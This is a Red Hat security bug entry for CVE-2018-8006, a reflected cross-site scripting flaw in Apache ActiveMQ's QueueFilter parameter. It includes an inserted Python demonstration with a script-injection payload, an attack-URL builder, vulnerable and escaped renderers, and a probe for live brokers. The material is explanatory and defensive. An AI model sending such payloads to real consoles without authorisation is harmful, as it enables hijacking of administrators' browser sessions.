Bug 1622774 (CVE-2018-8006)

Summary: CVE-2018-8006 activemq: Cross-site scripting (XSS) via QueueFilter parameter
Product: [Other] Security Response
Reporter: Sam Fowler <sfowler>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
CC: agrimm, aileenc, alazarot, anstephe, bmaxwell, bmcclain, cdewolf, chazlett, csutherl, darran.lofthouse, dfediuck, dimitris, dosoudil, drieden, eedri, etirelli, gvarsami, ibek, java-sig-commits, jawilson, jcoleman, jshepherd, krathod, kverlaen, ldimaggi, lgao, mgoldboi, michal.skrivanek, myarboro, nwallace, pdrozd, psampaio, pslavice, psotirop, puntogil, rnetuka, rrajasek, rsvoboda, rsynek, rwagner, rzhang, sbonazzo, sdaley, security-response-team, sherold, s, sthorger, tcunning, tdawson, tkirby, tmielke, twalsh, vtunka
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version: activemq 5.15.5
Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2021-10-25 22:15:56 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 1622775
Bug Blocks: 1622776

Description Sam Fowler 2018-08-28 02:40:55 UTC
Apache ActiveMQ before version 5.15.5 is vulnerable to a cross-site scripting (XSS) flaw via the QueueFilter parameter. An attacker could exploit this by feeding a URL-encoded script to the QueueFilter parameter in the URI.


External Reference:

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-008/?fid=11632


Upstream Bug:

https://issues.apache.org/jira/browse/AMQ-6954


Upstream Patches:

https://git-wip-us.apache.org/repos/asf?p=activemq.git;h=d25de5d
https://git-wip-us.apache.org/repos/asf?p=activemq.git;h=d8c80a9
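
The reflection described in the report, as an added example that is not part of the bug report, the Trustwave advisory, or ActiveMQ's own code. It models a console page that echoes the QueueFilter query parameter into an HTML attribute: an attacker URL-encodes a script into the URI, the servlet container decodes it, and the unescaped value lands in the page. The host, page path, markup and payload are constructed assumptions; the "fixed" renderer illustrates output encoding in general and is not the upstream patch linked above.

```python
"""Reflected XSS through a filter parameter: vulnerable vs. escaped output.

Added example, not code from ActiveMQ or from the advisory. It models a
console page that echoes a query parameter (here "QueueFilter") into an
HTML attribute. The host, page path, markup and payload are assumptions.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload: closes the value attribute, then injects a script element.
PAYLOAD = '"><script>alert(document.domain)</script>'

# Assumed page path; the report only names the parameter, not the page.
CONSOLE_URL = "http://broker.example:8161/admin/queues.jsp"
PARAM = "QueueFilter"


def build_attack_url(payload: str = PAYLOAD) -> str:
    """Attacker side: URL-encode the script into the filter parameter."""
    return f"{CONSOLE_URL}?{PARAM}={quote(payload, safe='')}"


def filter_from_url(url: str) -> str:
    """Server side: the container decodes %XX sequences before the page sees the value."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(PARAM, [""])[0]


def render_vulnerable(filter_value: str) -> str:
    """Echoes the raw parameter into the page (the pattern fixed in 5.15.5)."""
    return f'<input type="text" name="{PARAM}" value="{filter_value}">'


def render_fixed(filter_value: str) -> str:
    """Escapes <, >, &, " and ' so the value cannot break out of the attribute."""
    safe = html.escape(filter_value, quote=True)
    return f'<input type="text" name="{PARAM}" value="{safe}">'


def reflects_unescaped(url: str, render) -> bool:
    """Probe: True if the decoded parameter appears verbatim in the response.

    Only meaningful with a payload that contains HTML metacharacters; a
    benign value would be reflected verbatim by a correct page as well.
    """
    value = filter_from_url(url)
    return value in render(value)


def classify(render) -> str:
    """Label a renderer from the probe result."""
    return "vulnerable" if reflects_unescaped(build_attack_url(), render) else "fixed"


if __name__ == "__main__":
    url = build_attack_url()
    print(url)
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(name, "->", classify(render))
        print("  ", render(filter_from_url(url)))
```

Running the block prints the encoded URI, then the two rendered input elements: the vulnerable one contains a live `<script>` element after a closed attribute, the fixed one contains only `&quot;&gt;&lt;script&gt;...`. The same probe works against a live console by fetching the URI and checking whether the decoded payload appears in the body, which is the check to run on any pre-5.15.5 broker before deciding it is exposed.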

Comment 1 Sam Fowler 2018-08-28 02:41:42 UTC
Created activemq tracking bugs for this issue:

Affects: fedora-all [bug 1622775]

Comment 4 Joshua Padman 2019-05-15 22:53:59 UTC
This vulnerability is out of security support scope for the following products:
 * Red Hat JBoss A-MQ 6
 * Red Hat JBoss Fuse Service Works 6
 * Red Hat JBoss Fuse 6

Please refer to https://access.redhat.com/support/policy/updates/jboss_notes for more details.

Comment 7 Joshua Padman 2019-08-12 01:35:24 UTC
This vulnerability is out of security support scope for the following products:
 * JBoss Developer Studio 11

Please refer to https://access.redhat.com/node/4027141 for more details.

Comment 8 Joshua Padman 2019-08-28 11:08:57 UTC
Statement:

Red Hat Single Sign-On does not include the vulnerable web console components.